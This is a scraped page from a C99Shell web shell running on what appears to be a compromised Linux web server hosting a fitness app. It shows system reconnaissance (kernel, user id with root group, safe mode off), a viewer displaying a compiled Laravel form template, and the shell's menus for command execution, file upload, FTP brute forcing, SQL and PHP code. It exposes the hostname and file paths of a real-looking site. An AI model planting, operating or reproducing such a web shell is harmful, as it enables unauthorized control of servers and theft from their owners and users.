!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/fitness.picotech.app/public_html/storage/framework/views/   drwxrwxr-x
Free 26.66 GB of 117.98 GB (22.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     f9f890b5c2eabe89fd82312b86f945e5.php (3.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for=""><?php echo e(trans('Title')); ?></label>
    <input type="text" class="form-control" name="title" placeholder="<?php echo e(trans('Enter title')); ?>" value="<?php echo e(isset($plan)?$plan->title:''); ?>">
</div>

<div class="row">

    <div class="col-md-6">
        <label for=""><?php echo e(trans('Price')); ?></label>
        <input type="text" class="form-control plan_price" required name="price" placeholder="<?php echo e(trans('Enter price')); ?>" value="<?php echo e(isset($plan)?$plan->price:''); ?>">
    </div>

    <div class="col-md-6">
        <label for=""><?php echo e(trans('Recurring Type')); ?></label>
        <select name="recurring_type" class="form-control">
            <option  <?php echo e(isset($plan) && $plan->recurring_type=='weekly'?'selected':''); ?> value="weekly"><?php echo e(trans('Weekly')); ?></option>
            <option <?php echo e(isset($plan) && $plan->recurring_type=='weekly'?'selected':''); ?> value="monthly"><?php echo e(trans('Monthly')); ?></option>
            <option <?php echo e(isset($plan) && $plan->recurring_type=='weekly'?'selected':''); ?> value="yearly"><?php echo e(trans('Yearly')); ?></option>
        </select>
    </div>
</div>

<div class="row">
    <div class="col-md-12 form-group">
        <label for="">Description</label>
        <textarea name="description" class="form-control" placeholder="Enter descriptions.." cols="2" rows="2"><?php echo e(isset($plan)?$plan->description:''); ?></textarea>
    </div>
</div>

<div class="row mt-4">
    <div class="col-md-4">
        <input type="checkbox" <?php echo e(isset($plan) && $plan->meal_plan=='yes'?'checked':''); ?> name="meal_plan" id="mealPlan">
        <label class="ml-2" for="mealPlan"><?php echo e(trans('Meal Plan')); ?></label>
    </div>
    <div class="col-md-4">
        <input type="checkbox" <?php echo e(isset($plan) && $plan->workout_plan=='yes'?'checked':''); ?> name="workout_plan" id="workoutPlan">
        <label class="ml-2" for="workoutPlan"><?php echo e(trans('Workout Plan')); ?></label>
    </div>
    <div class="col-md-4">
        <input type="checkbox" <?php echo e(isset($plan) && $plan->live_support=='yes'?'checked':''); ?> name="live_support" id="liveSupport">
        <label class="ml-2" for="liveSupport"><?php echo e(trans('Live Support')); ?></label>
    </div>
</div>

<div class="row">
    <div class="col-md-12 text-right">
        <button class="btn-sm btn btn-success add_field" type="button">
            <i class="fa fa-plus"></i> Add Field
        </button>
    </div>
    <div class="col-md-12 mt-2" id="add_fields">
        <?php if(isset($plan->details) && $plan->details): ?>
        <?php $counter=988967?>

            <?php $__currentLoopData json_decode($plan->details); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $detail): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                <?php $counter++; ?>
                <?php if(isset($detail) && $detail): ?>
                    <div class="row form-group" id="delete_field_row_<?php echo e($counter); ?>">
                        <div class="col-md-11">
                            <input type="text" name="fields[]" class="form-control"
                                   value="<?php echo e(isset($detail)?$detail:''); ?>" placeholder="Enter field data">
                        </div>
                        <div class="col-md-1 col-1">
                            <button class="btn btn-sm btn-danger del_row" data-id="<?php echo e($counter); ?>" type="button"><i
                                    class="fa fa-times"></i></button>
                        </div>
                    </div>
                <?php endif; ?>
            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
        <?php endif; ?>


    </div>
</div>
<?php /**PATH /home/picotech/domains/fitness.picotech.app/public_html/resources/views/admin/plans/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--